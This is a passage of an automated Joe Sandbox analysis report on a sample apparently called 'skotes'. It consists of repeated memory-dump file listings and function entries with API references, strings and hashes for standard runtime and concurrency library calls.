                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                          • String ID: e
                                                                                                                                                                                                                                          • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                          • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                          • Instruction ID: 4557891558e9efcb5450756b700e5669296ced43f725ba90a0cc51778a000637
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11A031208145ABDB55DF7DC881AAA77E5EF07324B2481EAFC06EF202DB71D901CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 00B8D04C
                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00B8D03B
                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 00B8D05D
                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 00B8D069
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                          • Opcode ID: bee21f58025145cba90176f5710176634d02c7597243a946abadfe504c60b857
                                                                                                                                                                                                                                          • Instruction ID: 2858de87638c2254e21c7586eb1b523b57f41a212c10afae534674d15616e840
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bee21f58025145cba90176f5710176634d02c7597243a946abadfe504c60b857
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018420682B1169BA31777D5C21E5B53C8CB43B54F191EA6AC00F32E0EAA0DC01C662
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB4C98
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00BB4D5E
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB4DCA
                                                                                                                                                                                                                                            • Part of subcall function 00BAB04B: RtlAllocateHeap.NTDLL(00000000,EB1D7F10,?,?,00B8D3FC,EB1D7F10,?,00B87A8B,?,?,?,?,?,?,00B77465,?), ref: 00BAB07E
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB4DD3
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00BB4DF6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1423051803-0
                                                                                                                                                                                                                                          • Opcode ID: f15ce922f1593445118d5d6aa3fb1cbfd418e1ff1a913a1b58a6ad53182e9bec
                                                                                                                                                                                                                                          • Instruction ID: cf27ad1f4c7ef8ff87dbf64d89869df1c8582afda22464de26d81443bf4fcf61
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15ce922f1593445118d5d6aa3fb1cbfd418e1ff1a913a1b58a6ad53182e9bec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5251C272600216AFEB259F64DC81FFB3BE9EF85750F1506A9FD14A7152EBB0DC1086A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 00B9E91E
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B9E926
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B9E950
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B9E959
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00B9E9DC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
